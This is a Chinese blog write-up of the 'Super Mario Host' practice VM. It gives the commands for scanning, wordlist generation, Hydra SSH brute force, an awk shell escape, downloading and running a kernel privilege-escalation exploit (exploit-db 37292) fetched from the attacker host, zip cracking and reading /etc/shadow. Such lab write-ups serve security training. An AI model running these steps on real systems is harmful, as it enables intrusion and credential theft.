2020-11-23

最新推荐文章于 2022-10-29 22:28:30 发布
最新推荐文章于 2022-10-29 22:28:30 发布
阅读量175 收藏
点赞数
分类专栏: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wahhh123admin/article/details/110007699
版权

&&uper-Mario-Host(超级玛丽)&&

&&信息收集&&
1.确认主机ip
nmap 192.168.99.0/24
在这里插入图片描述
在这里插入图片描述详细信息和隐藏ip
nmap -A -p- 192.168.99.25
80端口被改成8180端口

在这里插入图片描述访问8180端口
在这里插入图片描述

目录扫描
dirb http://192.168.99.25:8081 /usr/share/dirb/wordlists/big.txt
爆出两个目录
在这里插入图片描述
/server-status/访问(拒绝访问)
在这里插入图片描述
/vhosts/获得一些敏感信息
在这里插入图片描述

我们访问一下这个域名,没解析出来
在这里插入图片描述看了大神的文章好像要在本地hosts文件添加192.168.99.25 mario.supermariohost.local 这样才能进行解析

windows:在C:\Windows\System32\drivers\etc\hosts
linux:在/etc/hosts
在末尾加上ip加域名就可以解析访问了在这里插入图片描述

&&web渗透&&

访问成功在这里插入图片描述

目录爆破
在这里插入图片描述

/luigi.php
在这里插入图片描述
/command.php
在这里插入图片描述
cewl 密码生成字典
cewl http://mario.supermariohost.local:8180/luigi.php -w user.txt
在这里插入图片描述
john在user字典上生成相应的社工密码字典
john --wordlist=user.txt --stdout --rules > password.txt +
在这里插入图片描述
hydra暴力破解
hydra -L user.txt -P passwd.txt ssh://192.168.99.25 -t 20
在这里插入图片描述
ssh登入
ssh luigi@192.168.99.25
在这里插入图片描述
ls在这个下面貌似有条消息
在这里插入图片描述
cat看看
在这里插入图片描述
这是暗示我们要扩展使用权限么
有一个awk
提权命令
awk ‘BEGIN {system("/bin/bash")}’
得到一个普通用户使用权限

在这里插入图片描述
uname -a 这个版本内核貌似有漏洞
在这里插入图片描述

&&提权&&

serchsploit linux 3.13.0
在这里插入图片描述
将其拷贝到www目录下,开启apache服务
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html/37292.c
在这里插入图片描述

靶机切换到tmp目录下,下载exp到tmp下
wget http://192.168.99.6/37292.c /tmp/37292.c

在这里插入图片描述
编译下载的exp,并且运行
gcc 37292.c -o exp2
./exp2

在这里插入图片描述
获得管理员权限
在这里插入图片描述
交互式shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
解压flag.zip发现需要密码
在这里插入图片描述
将这个包放到/var/www/html下,并且下载在攻击机下

在这里插入图片描述
攻击机下载
在这里插入图片描述
fcrackzip压缩包破解
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
在这里插入图片描述
密码破解为ilovepeach,破解成功
在这里插入图片描述
查看flag.txt

在这里插入图片描述
这flag.txt的意思是拿下靶机所有用户的明文密码

cat /etc/shadow
在这里插入图片描述·

wahhh123admin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2225
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
一次0基础靶机的渗透
2302_77203524的博客
07-26 46
一次0基础靶机的渗透
【VulnHub靶场】——BOREDHACKERBLOG: SOCIAL NETWORK
Demo不是emo的博客
10-29 7139
二十四次系统性打靶第一次,每次打靶后都会分享靶场攻略和总结的知识点,如果对渗透测试和打靶比较感兴趣的小伙伴们也可以跟着我一起训练哦
渗透测试实战7——超级玛丽靶机入侵
浅浅的博客
05-10 1224
一、实验环境 攻击机(Kali):192.168.247.171 靶机(Node):192.168.247.170 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22端口 3、端口详细信息 可以看到该靶机开放了2个端口,分别是8180端口和22端口,我们以8180端口开始。 (二)端口探测 8180端口 —— http...
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 958
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
UL 1123-2020-11-23-final.pdf
09-02
很抱歉,但根据您提供的信息,"UL 1123-2020-11-23-final.pdf" 的描述中没有提供任何具体内容,只有一串重复的"poorest"字符。这使得无法直接生成相关的IT知识点。通常,UL 1123标准是关于电池充电系统的安全要求,...
Project_最小C51系统_2020-11-23_17-28-40_开发板PCB_立创EDAC51_
10-02
标题中的"Project_最小C51系统_2020-11-23_17-28-40_开发板PCB_立创EDAC51_"揭示了一个项目,专注于构建一个基于C51微控制器的最小系统。这个系统在20201123日的特定时间进行了开发,并且与立创EDAC51开发板的...
Maple-Chan#Maple-Chan.Blog#2020-11-23-Builder模式1
07-25
介绍UserBuilder builder = new UserBuilder();User user = builder.builder();可以通过上述代码
Screenrecorder-2020-07-14-11-13-20-521.mp4
07-14
安卓开发,仿淘宝首页分类效果实现,带进度条seekbar,可以左右滚动,进度条实现跟随手势滑动的效果
Dell3020MT_EFI_OC_Catalina_BigSur_2020-11-23.zip
11-23
Dell Optiplex 3020 MT 最新 黑苹果 EFI ,基于 OpenCore 0.6.2 可以启动 Catalina 10.15.7 及 Big Sur 11.0.1 修复了关于本机中机型及CPU型号的显示,以及关闭了启动时EFI的日志
4-VulnHub-Tr0ll
尼德霍格007
07-09 148
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 目标:得到root权限&找到proof.txt 作者:尼德霍格007 时间:2021-7-9 准备工作:kali虚拟机(NAT),raven2虚拟机(NAT) 一、信息收集 使用nmap获取目标IP地址: nmap -sP 192.168.21.0/24 我的kali机IP地址是192.168.21.128,网关地址是192.168.21.2,那么目标机IP地址就是192.168.21.135 第一步
vulnhub靶机-CyberSploit: 1
臭nana的博客
07-20 1377
这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单 1、找到靶机ip:192.168.0.130 nmap -sn 192.168.0.0/24 2、扫描靶机端口 3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv 4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1 root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..
21年江西省赛题:B-4:系统漏洞利用与提权
m0_69408815的博客
08-29 1602
Find / -name 37292.c 查看37292.c路径在/usr/share/exploitdb/exploits/linux/local/37292.c。4. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;7. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;5. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;...
Vulnhub-potato靶机实战
千寻的博客
01-12 886
文章目录学习笔记下载靶机下载第一部分 信息收集第一步 主机发现第二步 端口扫描第三步 访问网站第四步 扫描目录第四步 访问扫描出的目录第五步 回到开放的端口,分析,发现7120开放第二部分 ssh利用使用Hydra破解ssh第三部分 提权第一步 查看基本的系统信息第二步 利用MSF查找可利用的漏洞第三步 将文件上传到靶机第四步 查找flag摘抄 学习笔记下载 https://download.csdn.net/download/qq_41901122/14122921 靶机下载 https://www.
靶机渗透测试(CyberSploit: 1)
@小张小张的博客
10-12 2437
靶机渗透测试(CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
07-13
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
Java语言基础入门教程 Java开发编程基础课程 第6章 字符串 共30页.pptx
07-13
【课程大纲】 第1、2、3章 Java简介 共15页.pptx 第4章 流程控制 共14页.pptx 第5章 数组 共8页.pptx 第6章 字符串 共30页.pptx 第7章 定义类 共10页.pptx 第8章 内部类和异常处理 共18页.pptx 第8章 生成对象 共18页.pptx 第9章 类的高级特性 共12页.pptx 第9章 深度了解变量和方法 共13页.pptx 第10章 理解包 共18页.pptx 第11章 继承、多态和接口 共21页.pptx 第12章 内部类和异常处理 共18页.pptx 第13章 图形用户界面 共31页.pptx 第14章 线程 共22页.pptx
大学生创业计划书(26)三篇文件.docx
07-14
大学生创业计划书(26)三篇文件.docx
mipi-UniPro-specification-v2-0 pdf
最新发布
07-14
mipi_UniPro_specification_v2-0 协议
根据String类型的时间段【2020-11-20 09:09:09,2021-10-09 10:10:10】先转换为【2020-11-20 00:00:00,2021-10-09 59:59:59】 再根据转换时间把里面的每一天的开始时间和结束时间获取出来 java
05-24
可以使用Java中的...2020-11-22 00:00:00 - 2020-11-23 00:00:00 ... 2021-10-07 00:00:00 - 2021-10-08 00:00:00 2021-10-08 00:00:00 - 2021-10-09 00:00:00 2021-10-09 00:00:00 - 2021-10-09 23:59:59 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值